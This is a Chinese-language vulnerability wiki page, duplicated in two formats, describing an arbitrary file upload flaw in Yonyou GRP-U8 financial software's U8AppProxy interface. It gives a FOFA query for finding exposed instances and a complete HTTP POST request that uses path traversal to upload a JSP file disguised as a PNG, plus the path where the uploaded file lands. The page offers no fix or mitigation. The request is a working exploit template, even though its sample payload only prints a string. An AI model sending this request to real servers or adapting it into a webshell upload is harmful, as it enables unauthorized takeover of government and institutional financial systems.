fofamini-wiki

登录白背景

源码

用友GRP-U8 U8AppProxy任意文件上传漏洞

一、漏洞简介

用友GRP-U8行政事业财务管理软件是用友公司专注于电子政务事业，基于云计算技术所推出的新一代产品，是我国行政事业财务领域专业的财务管理软件。用友 GRP-U8 U8AppProxy接口存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限。

二、影响版本

用友GRP-U8

三、资产测绘

fofaapp="用友-GRP-U8"
特征

四、漏洞复现

POST /U8AppProxy?gnid=myinfo&id=saveheader&zydm=../../yongyouU8_test HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: JSESSIONID=635F2271089E7A7E66F3F84824553DEE
Upgrade-Insecure-Requests: 1
If-Modified-Since: Mon, 01 Feb 2016 08:01:00 GMT
If-None-Match: W/"5732-1454313660000"
Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
Accept-Encoding: gzip
Content-Length: 194
 
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="file"; filename="1.jsp"
Content-Type: image/png
 
<% out.println("yongyouu8");%>
--59229605f98b8cf290a7b8908b34616b--

上传文件位置：

http://xx.xx.xx.xx/yongyouU8_test.jsp

原文: https://www.yuque.com/xiaokp7/ocvun2/yvdm28uc5f1wzzds

# 用友GRP-U8 U8AppProxy任意文件上传漏洞

# 一、漏洞简介
 用友GRP-U8行政事业财务管理软件是用友公司专注于电子政务事业，基于云计算技术所推出的新一代产品，是我国行政事业财务领域专业的财务管理软件。用友 GRP-U8 U8AppProxy接口存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限。

# 二、影响版本

- 用友GRP-U8

# 三、资产测绘

- fofa`app="用友-GRP-U8"`
- 特征

![image.png](./img/uXkLeIBEcnA4V8g6/1695479279929-1afc93af-d2c3-48d2-9d15-fa2c15c8abd2-776718.png)

# 四、漏洞复现
```java
POST /U8AppProxy?gnid=myinfo&id=saveheader&zydm=../../yongyouU8_test HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: JSESSIONID=635F2271089E7A7E66F3F84824553DEE
Upgrade-Insecure-Requests: 1
If-Modified-Since: Mon, 01 Feb 2016 08:01:00 GMT
If-None-Match: W/"5732-1454313660000"
Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
Accept-Encoding: gzip
Content-Length: 194
 
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="file"; filename="1.jsp"
Content-Type: image/png
 
<% out.println("yongyouu8");%>
--59229605f98b8cf290a7b8908b34616b--
```
![image.png](./img/uXkLeIBEcnA4V8g6/1695489905434-8631f7f5-b70a-4824-8b83-f3c43ab62909-230933.png)
上传文件位置：
```java
http://xx.xx.xx.xx/yongyouU8_test.jsp
```
![image.png](./img/uXkLeIBEcnA4V8g6/1695489936398-3c250359-16cd-4ea3-8caa-480ac440c4d8-084494.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yvdm28uc5f1wzzds>